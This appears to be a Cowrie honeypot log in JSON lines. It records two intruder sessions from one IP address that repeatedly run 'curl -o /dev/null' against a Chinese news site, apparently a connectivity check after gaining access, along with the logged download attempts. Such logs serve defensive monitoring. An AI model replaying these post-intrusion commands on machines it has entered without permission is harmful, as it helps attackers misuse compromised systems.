{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:31:00.270106Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:00.270792Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:00.277346Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:00.278308Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:00.293644Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:00.298093Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:00.299149Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:00.316124Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:00.317148Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:00.319146Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:00.320993Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:00.335884Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:00.337059Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:00.357421Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:00.358639Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:00.375508Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:00.377529Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:00.381279Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:00.382557Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:00.395364Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:00.396678Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:00.410454Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:00.412168Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:00.421379Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:00.422640Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:00.433308Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:00.434609Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:00.448320Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:00.450043Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:00.491660Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:00.534201Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:00.535684Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:00.538531Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:00.541389Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:00.544603Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:00.546129Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:00.597434Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:00.599711Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:00.639750Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:00.641794Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:31:00.645044Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:00.690553Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:00.694054Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:00.717404Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:00.718676Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:00.722540Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:00.724807Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:00.738963Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:00.740285Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:00.758517Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:00.759830Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:00.762570Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:00.763461Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:00.788937Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:00.791391Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:00.800445Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:00.801798Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:00.805956Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:00.807194Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:00.825832Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:00.842387Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:00.843865Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:00.847510Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:00.848487Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:00.866223Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:00.868042Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:00.881809Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:00.882981Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:00.894785Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:00.895893Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:00.908128Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:00.909472Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:00.923956Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:00.925083Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:00.938816Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:00.940055Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:00.967276Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:00.969387Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:00.971784Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:00.972915Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:00.992701Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:00.994056Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:01.016520Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:01.018050Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:01.034961Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:01.036243Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:01.054755Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:01.055755Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:31:01.076257Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:01.078341Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:01.079347Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:01.096595Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:01.097873Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:01.118791Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:01.121002Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:01.123899Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:01.124889Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:01.141205Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:01.142373Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:01.162410Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:01.164194Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:01.175256Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:01.176396Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:01.190895Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:01.194168Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:01.199513Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:01.201923Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:01.226026Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:01.227386Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:01.235636Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:01.237615Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:01.241394Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:01.242479Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:01.268842Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:01.270083Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:01.272078Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:01.279995Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:01.281503Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:01.310243Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:01.312449Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:01.329793Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:01.331059Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:01.334825Z","src_ip":"212.227.125.160","session":"7541ed730449"}
